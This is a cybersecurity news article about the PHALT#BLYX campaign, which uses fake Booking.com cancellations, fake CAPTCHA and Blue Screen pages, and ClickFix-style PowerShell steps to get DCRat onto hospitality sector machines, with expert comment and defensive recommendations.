Cybercriminals are increasingly proving they don’t need software vulnerabilities to compromise organizations — they need convincing deception.
Researchers at Securonix are warning of a sophisticated phishing campaign targeting the hospitality sector that uses fake Booking.com reservation cancellations, deceptive CAPTCHA pages, and a panic-inducing fake Windows Blue Screen of Death (BSOD) to deploy a remote access trojan (RAT). The campaign, dubbed PHALT#BLYX, highlights how attackers are blending social engineering with trusted system tools to bypass traditional security controls.
From booking cancellation to system compromise
The attack chain begins with a phishing email masquerading as a Booking.com reservation cancellation notice. The message includes realistic room charge details in euros and references a charge or refund exceeding €1,000—a deliberate tactic to create urgency and prompt victims to click.
According to Securonix, the campaign relies on a ClickFix-style social engineering pattern to move victims from a simple phishing email to executing malware. In its analysis, the company notes:
"An ongoing malware campaign tracked as PHALT#BLYX has been identified as a multi-stage infection chain that begins with the click-fix and fake captcha social engineering tactic and deploys a customized DCRat payload.… The final payload is a heavily obfuscated version of DCRat, capable of process hollowing, keylogging, persistent remote access and dropping secondary payloads."
Once a victim clicks the phishing link, they are redirected to an impersonating website that initially displays a fake CAPTCHA or browser error. Clicking a "Reload" button triggers the next stage of the attack, where the browser enters full-screen mode and displays a convincing BSOD animation.
The fake error message instructs the user to enter a series of keyboard commands, which ultimately execute PowerShell commands. Those commands download a malicious MSBuild project file, allowing the attackers to continue the infection using legitimate Windows tooling.
Living off the land with trusted tools
The campaign's use of MSBuild.exe, a legitimate Microsoft build utility, is central to its stealth. Once downloaded, the malicious project file is compiled and executed by MSBuild, resulting in Windows Defender being disabled, persistence mechanisms being established, and the execution of a customized .NET-based DCRat payload.
Securonix researchers observed that the malware checks the current user's privileges and, if administrative access is not present, attempts privilege escalation using User Account Control (UAC) prompt spam. The final payload is designed for resilience and long-term access, allowing attackers to monitor activity, steal credentials, and deploy additional malware.
"This PHALT#BLYX activity is a good example of where attackers don't require a vulnerability for exploitation," said Christopher Jess, Senior R&D Manager at Black Duck. "By combining a fake Booking.com cancellation lure with a bogus CAPTCHA and a panic-inducing BSOD, the campaign uses the ClickFix pattern to coax a user into running PowerShell themselves, then leans on built-in tools by abusing trusted Windows tooling like MSBuild.exe to compile and run the next stage."
Jess noted that this blend of social engineering and living-off-the-land techniques is intentionally designed to evade security controls that focus on detecting clearly malicious executables.
Why ClickFix is gaining momentum
Security teams should not assume this technique will remain confined to the hospitality sector.
"Organizations should assume this technique will spread," Jess warned. "ClickFix has already shown broad adoption across threat actors, lures, and geographies because it's low cost to retheme and it relies on user execution rather than a single vulnerable product. What looks like a hospitality problem today can become shipping, HR, or finance tomorrow with the same playbook."
Securonix noted that the campaign primarily targeted European hospitality organizations in late December 2025—a timing that coincides with peak travel season and reduced staffing, when employees are more likely to act quickly on booking-related messages.
Browser abuse enables deception
The fake BSOD plays a critical role in convincing victims that something is seriously wrong and that immediate action is required.
"Displaying a fullscreen BSOD is a key part of tricking the user here," said Lionel Litty, CISO and Chief Security Architect at Menlo Security. "Perhaps surprisingly, a website can enter fullscreen mode without requiring a browser permission prompt. The only prerequisite is a user action that demonstrates the user is interacting with the page."
In this campaign, simply clicking "Reload" is enough to grant the attacker the visual control needed to convincingly impersonate a system-level error—underscoring how powerful browser APIs can be when abused by malicious actors.
Desktop today, mobile tomorrow
While PHALT#BLYX currently focuses on desktop systems, experts warn that the same techniques are already being adapted for mobile delivery.
"Campaigns such as this highlight how attackers increasingly rely on social engineering and trusted brand impersonation to bypass traditional controls—and these tactics don't stop at desktops," said Kern Smith, Senior Vice President of Global Solutions Engineering at Zimperium. "We routinely see the same lures adapted for mobile delivery, where phishing links, fake CAPTCHAs, and malicious redirects are even harder for users to detect."
Smith added that a mobile-first strategy allows attackers to bypass perimeter, email, and network defenses entirely by pushing users to interact directly with malicious content on devices where visibility and enforcement are often weaker.
How organizations can break the chain
Defending against ClickFix-style attacks requires focusing on controls organizations actually own.
Jess recommends breaking the attack chain at three key points: people, privileges, and permitted tools. That includes training employees never to run commands simply because a webpage or "verification screen" instructs them to do so; restricting developer tools like MSBuild to systems that genuinely require them; reducing local administrator privileges; and monitoring for suspicious process chains—such as a browser spawning PowerShell and then MSBuild.
Finally, organizations should treat RAT deployment as a serious incident with follow-on risk.
"These tools usually mean someone's poking around, stealing credentials, or setting up more attacks," Jess said. Indicators such as disabled Defender settings, unexpected persistence mechanisms, anomalous MSBuild activity, or unusual outbound traffic should trigger immediate investigation, isolation of affected systems, and credential resets.
A familiar lesson, evolving tactics
PHALT#BLYX reinforces a familiar reality for defenders: attackers are increasingly winning by exploiting human behavior rather than technical weaknesses. By combining trusted brands, browser-based deception, and legitimate system tools, threat actors are creating attacks that are harder to detect, easier to scale, and effective across industries.
For security teams, the challenge isn't just stopping malware—it's recognizing when seemingly normal tools and workflows are quietly weaponized against them.
Follow SecureWorld News for more stories related to cybersecurity.
